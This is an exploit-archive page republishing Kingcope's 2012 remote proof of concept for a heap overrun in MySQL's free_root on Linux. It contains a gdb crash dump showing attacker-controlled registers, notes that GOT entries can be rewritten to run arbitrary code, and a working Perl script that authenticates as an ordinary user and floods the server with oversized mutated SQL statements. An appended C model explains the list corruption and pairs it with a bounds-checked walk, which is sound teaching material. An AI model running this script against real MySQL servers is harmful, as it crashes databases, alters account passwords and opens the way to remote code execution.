MySQL (Linux) Heap Based Overrun PoC Zeroday

2012-12-02 / 2012-12-04
Credit: Kingcope
Risk: Medium
Local: No
Remote: Yes (authenticated: the PoC connects over TCP 3306 with an ordinary user account)
CWE: CWE-119


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# MySQL Heap Overrun
# tested for the latest version of mysql server on a SuSE Linux system
#
# As seen below $edx and $edi are fully controlled,
# the current instruction is
# => 0x83a6b24 <free_root+180>: mov (%edx),%edi
# this means we landed in a place where 4 bytes can be controlled by 4 bytes
# with this function pointers and GOT entries can be rewritten to execute arbitrary code
#
# a user account (with less privileges) is needed
# beware: this script will change the user's password to an undefined value
#
=for comment
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xa86b3b70 (LWP 9219)]
free_root (root=0x8e7c714, MyFlags=1) at /root/mysql-5.5.19/mysys/my_alloc.c:369
369         old=next; next= next->next;
(gdb) bt
#0  free_root (root=0x8e7c714, MyFlags=1) at /root/mysql-5.5.19/mysys/my_alloc.c:369
#1  0x082a2e9f in cleanup (thd=0x8e7b9b8, all=true) at /root/mysql-5.5.19/sql/sql_class.h:1709
#2  ha_rollback_trans (thd=0x8e7b9b8, all=true) at /root/mysql-5.5.19/sql/handler.cc:1401
#3  0x0824a747 in trans_rollback (thd=0x8e7b9b8) at /root/mysql-5.5.19/sql/transaction.cc:260
#4  0x081897a7 in THD::cleanup (this=0x8e7b9b8) at /root/mysql-5.5.19/sql/sql_class.cc:1271
#5  0x08140fc3 in thd_cleanup (thd=0x8e7b9b8) at /root/mysql-5.5.19/sql/mysqld.cc:2026
#6  unlink_thd (thd=0x8e7b9b8) at /root/mysql-5.5.19/sql/mysqld.cc:2075
#7  0x08141088 in one_thread_per_connection_end (thd=0x8e7b9b8, put_in_cache=true) at /root/mysql-5.5.19/sql/mysqld.cc:2188
#8  0x0823eab3 in do_handle_one_connection (thd_arg=0x8e7b9b8) at /root/mysql-5.5.19/sql/sql_connect.cc:796
#9  0x0823ebbc in handle_one_connection (arg=0x8e7b9b8) at /root/mysql-5.5.19/sql/sql_connect.cc:708
#10 0xb7744b05 in start_thread () from /lib/libpthread.so.0
#11 0xb750fd5e in clone () from /lib/libc.so.6
(gdb) i r
eax            0x8ec63b8    149709752
ecx            0xa86b326c   -1469369748
edx            0x5a5a5a5a   1515870810
ebx            0x880eff4    142667764
esp            0xa86b31b0   0xa86b31b0
ebp            0xa86b31d8   0xa86b31d8
esi            0x8e7c714    149407508
edi            0x5a5a5a5a   1515870810
eip            0x83a6b24    0x83a6b24 <free_root+180>
eflags         0x210293     [ CF AF SF IF RF ID ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
(gdb) x/10i $eip
=> 0x83a6b24 <free_root+180>:   mov    (%edx),%edi
   0x83a6b26 <free_root+182>:   je     0x83a6b33 <free_root+195>
   0x83a6b28 <free_root+184>:   mov    %edx,(%esp)
   0x83a6b2b <free_root+187>:   call   0x83acb70 <my_free>
   0x83a6b30 <free_root+192>:   mov    0x8(%esi),%eax
   0x83a6b33 <free_root+195>:   test   %edi,%edi
   0x83a6b35 <free_root+197>:   jne    0x83a6b20 <free_root+176>
   0x83a6b37 <free_root+199>:   test   %eax,%eax
   0x83a6b39 <free_root+201>:   movl   $0x0,(%esi)
   0x83a6b3f <free_root+207>:   movl   $0x0,0x4(%esi)
(gdb)
=cut
use strict;
use warnings;
use Net::MySQL;

$| = 1;   # autoflush, so the progress line is visible before the server dies

# Target and credentials of the low-privileged account used for the test.
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',
    database => "test",
    user     => "user",
    password => "test",
    debug    => 0,
    port     => 3306,
);

# Statements to mutate. Each is re-sent once per character position, with
# that character replaced by a 10000-byte run of 'Z' (0x5a, the value that
# shows up in $edx/$edi in the crash above).
my @commands = (
    'USE d',
    'SHOW TABLES FROM d',
    "DESCRIBE t",
    "SHOW FIELDS FROM t",
    "SHOW COLUMNS FROM t",
    "SHOW INDEX FROM t",
    "CREATE TABLE table_name (c CHAR(1))",
    "DROP TABLE t",
    "ALTER TABLE t DROP c",
    "DELETE FROM t WHERE 1=1",
    "UPDATE t SET a=a",
    "SET PASSWORD=PASSWORD('p')",
);

foreach my $command (@commands) {
    for (my $k = 0; $k < length($command); $k++) {
        my $c  = substr($command, 0, $k) . "Z" x 10000 . substr($command, $k + 1);
        # shortened copy of the same mutation, printed as a progress marker
        my $c2 = substr($command, 0, $k) . "AAAA..AA" . substr($command, $k + 1);
        print "$c2\n";
        $mysql->query($c);
    }
}
$mysql->close;
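What the crash above looks like in code, as an added example that is not part of Kingcope's post and not MySQL's own source: a cut-down model of the block list that free_root() walks at my_alloc.c:369 (old=next; next=next->next; free old). The header layout, the 4096-byte arena and the 64-byte buffer are assumptions made for illustration. It shows how an unchecked copy of a long 'Z' run past one block's data lands in the following block's header, so the walk picks up next == 0x5a5a5a5a (the $edx value in the register dump; the same byte pattern at native pointer width here), and beside it a walk that validates every link against the arena before dereferencing it, returning an error instead of faulting.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ARENA_SIZE 4096                                   /* assumption */
#define BUF_SIZE   64                                     /* assumption */
/* 'Z' (0x5a) repeated across the native pointer width: 0x5a5a...5a */
#define Z_PATTERN  ((~(uintptr_t)0 / 0xffu) * 0x5au)

/* Simplified block header, modelled on MySQL's USED_MEM (next/left/size). */
typedef struct used_mem {
    struct used_mem *next;
    unsigned int     left;
    unsigned int     size;
} used_mem;

typedef struct {
    used_mem      *used;             /* head of the block list (MEM_ROOT::used) */
    unsigned char  mem[ARENA_SIZE];  /* backing store the blocks are carved from */
} mem_root;

static unsigned char *block_data(used_mem *blk) { return (unsigned char *)(blk + 1); }

/* Two blocks: [A header][A data: BUF_SIZE bytes][B header][B data ...] */
static void mem_root_init(mem_root *root)
{
    memset(root->mem, 0, sizeof root->mem);
    used_mem *a = (used_mem *)root->mem;
    used_mem *b = (used_mem *)(root->mem + sizeof(used_mem) + BUF_SIZE);
    a->next = b;    a->left = 0; a->size = sizeof(used_mem) + BUF_SIZE;
    b->next = NULL; b->left = 0; b->size = sizeof(used_mem) + BUF_SIZE;
    root->used = a;
}

/* The bug class: copy into A's BUF_SIZE-byte buffer with no length check.
 * Any len > BUF_SIZE runs straight into B's header. */
static void copy_unchecked(mem_root *root, const unsigned char *src, size_t len)
{
    memcpy(block_data(root->used), src, len);
}

/* Mirrors the loop at my_alloc.c:369.  With B->next clobbered this
 * dereferences 0x5a5a...5a (the advisory's SIGSEGV); only call on a clean list. */
static int free_root_unchecked(mem_root *root)
{
    int freed = 0;
    used_mem *next = root->used, *old;
    while (next) {
        old  = next;
        next = next->next;            /* the faulting mov (%edx),%edi */
        memset(old, 0, sizeof *old);  /* stand-in for my_free(old) */
        freed++;
    }
    root->used = NULL;
    return freed;
}

/* A link is followed only if a whole, aligned header fits inside the arena. */
static int link_in_arena(const mem_root *root, const used_mem *p)
{
    uintptr_t lo = (uintptr_t)root->mem, hi = lo + ARENA_SIZE, v = (uintptr_t)p;
    return v >= lo && v < hi && hi - v >= sizeof(used_mem) && (v - lo) % sizeof(void *) == 0;
}

/* Same walk with the link check.  Returns blocks freed, or -1 on corruption
 * (the rest of the list is left alone rather than followed). */
static int free_root_checked(mem_root *root)
{
    int freed = 0;
    used_mem *next = root->used, *old;
    while (next) {
        if (!link_in_arena(root, next))
            return -1;
        old  = next;
        next = next->next;
        memset(old, 0, sizeof *old);
        freed++;
    }
    root->used = NULL;
    return freed;
}

/* Build a list and, if asked, overrun A's data with BUF_SIZE + header bytes of 'Z'. */
static void setup(mem_root *root, int overrun)
{
    unsigned char payload[BUF_SIZE + sizeof(used_mem)];   /* constructed input */
    mem_root_init(root);
    if (overrun) {
        memset(payload, 'Z', sizeof payload);
        copy_unchecked(root, payload, sizeof payload);
    }
}

/* B->next as the list walk will see it after the overrun: Z_PATTERN. */
static uintptr_t clobbered_link_after_overrun(void)
{
    static mem_root root; setup(&root, 1);
    return (uintptr_t)root.used->next->next;
}
static int unchecked_walk_clean(void)       { static mem_root r; setup(&r, 0); return free_root_unchecked(&r); }
static int checked_walk_clean(void)         { static mem_root r; setup(&r, 0); return free_root_checked(&r); }
static int checked_walk_after_overrun(void) { static mem_root r; setup(&r, 1); return free_root_checked(&r); }

int main(void)
{
    printf("B->next after overrun: 0x%llx\n", (unsigned long long)clobbered_link_after_overrun());
    printf("unchecked walk, clean list: %d\n", unchecked_walk_clean());
    printf("checked walk, clean list: %d\n", checked_walk_clean());
    printf("checked walk, corrupted list: %d\n", checked_walk_after_overrun());
    return 0;
}
```

The checked walk is a containment measure, not a fix: it turns the fault into an error return and leaks the tail of the list, which is the right trade when the alternative is a dereference of attacker-chosen bytes followed by my_free() on that same pointer (the call at free_root+187). The actual fix is the missing length check on whichever copy writes past its block, which the advisory does not pin down.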

References:

http://seclists.org/fulldisclosure/2012/Dec/5
https://bugzilla.redhat.com/show_bug.cgi?id=882600


Copyright 2019, cxsecurity.com